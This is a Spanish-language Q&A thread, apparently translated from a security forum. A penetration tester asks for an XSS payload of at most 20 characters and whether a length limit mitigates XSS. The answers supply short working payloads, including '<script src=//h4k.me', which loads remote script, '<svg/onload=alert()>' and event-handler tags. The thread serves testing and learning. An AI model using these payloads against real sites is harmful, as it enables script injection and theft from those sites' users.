Verificación de secuencias de comandos entre sitios en un campo que no acepta más de 20 caracteres

Navega tus respuestas
11

Mientras realizaba las pruebas de penetración, me quedé atascado en un punto. Hay un campo de texto que no acepta más de 20 caracteres (validación del lado del servidor). Inserté el siguiente fragmento de código para verificar XSS (de la hoja de trucos XSS de RSnake): 

'';!--"<XSS>=&{()}

y verificó la fuente de <XSS verses &lt;XSS para ver si es vulnerable. Obtuve <XSS en la fuente, lo que sugiere que este campo es vulnerable a los scripts entre sitios.

Ahora estoy intentando crear un código que debería ser menor o igual a 20 caracteres y podría ejecutarse en este campo para confirmar el XSS, pero lo encuentro difícil. Así que en este caso tengo básicamente dos preguntas:

1: ¿Puede alguien ayudarme con tal parte del código?

2: para mitigar XSS, la validación de longitud máxima (15-20 caracteres) podría ser una de las opciones aparte de la combinación de validación de datos + codificación HTML Por favor, asuma que las reglas comerciales están de acuerdo con el límite de 15-20 caracteres.

Espero haber podido explicar la pregunta y el escenario. Por favor, hágamelo saber en caso de cualquier duda.

    
pregunta p_upadhyay 14.06.2011 - 08:39
fuente

3 respuestas

9

Me encanta la ironía. Aquí está la línea que iba a ser mi respuesta. Y el error que recibí por publicarlo. 

<script src=//h4k.me

¡Vaya! Su respuesta no pudo ser enviada porque:

el cuerpo debe tener al menos 30 caracteres; ingresaste 20

Utilice la refundición de variables si es posible antes de procesar la entrada (si no es así, regex para desechar < 's / s, etc.)

    
respondido por el Ori 14.06.2011 - 09:18
fuente
5

Aparte del script proporcionado por Ori, hay algunos otros scripts que podrían ser útiles en este caso: - 

<a href=http://a.by>
<a onclick=alert(2)>
<b onclick=alert(2)>
    
respondido por el p_upadhyay 22.06.2011 - 11:19
fuente
0

La carga útil XSS más corta que he visto que abre un cuadro de diálogo de alerta y no requiere la interacción del usuario es la siguiente: 

<svg/onload=alert()>

Sin embargo, si el único requisito es que debe ser utilizable para las pruebas de vulnerabilidad XSS, este es el más breve que puede obtener: 

<

Solo deberías ver la fuente de la página para ver si escribe < o &#x3C; en la página, por lo que no es tan rápido

    
respondido por el Arin 07.07.2017 - 05:46
fuente

Lea otras preguntas en las etiquetas

Generación de contraseñas: ¿demasiado primitiva? ¿Es realista solo necesitar recordar una contraseña para el administrador de contraseñas?